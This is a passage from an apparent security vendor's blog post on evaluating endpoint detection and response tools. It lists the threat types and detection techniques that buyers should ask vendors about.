3: How does the solution detect threats to your organization?
Understanding the types of threats an EDR security tool detects—as well as the technologies and techniques used—is often a central point of evaluation. Many solutions take a very limited approach to detection and are handicapped against solutions that provide broader coverage of threats.
Below are a few examples of criteria to understand when evaluating threat detection capabilities.
Types of threats detected:
- Malware (crimeware, ransomware, trojans, exploit kits, etc.)
- Misuse of legitimate applications (PowerShell, WMI, mshta.exe)
- File-based attacks (Microsoft Office, Adobe PDF, etc.)
- Unwanted software (browser toolbars, PUPs)
- Insider threats (malicious employee, compromised credentials, accidental release of data)
- Suspicious user activity
- Suspicious application behavior
Technologies and techniques used for detection:
- Behavioral analysis
- User behavior analytics
- Long tail analytics and anomaly detection
- Dynamic binary analysis (“sandboxing”)
- Static binary analysis
- Network threat intelligence (known bad domains, IP addresses)
- Binary threat intelligence (known bad MD5s/SHAs, file paths, binary signing data, YARA, etc.)
The EDR Buyer’s Guide also includes specific scenarios to ask vendors about and helpful tips for gauging false positive rates, tuning, and understanding the benefits and drawbacks of broad versus narrow detection coverage.
Support for evaluating EDR security tools
Red Canary was built to support organizations struggling to manage the complexities of threat detection and response. We hope this guide helps you through your evaluation and purchase. If you have additional questions, we’re here to help. Contact us anytime with questions or to request a conversation to help guide you during your EDR evaluation.
Editor’s note: This blog post and the related EDR Buyer’s Guide were originally published in February 2017. Both resources have been updated based on changes in the EDR market and continuing evolution in the endpoint security space. We hope the information helps security teams navigate their evaluations.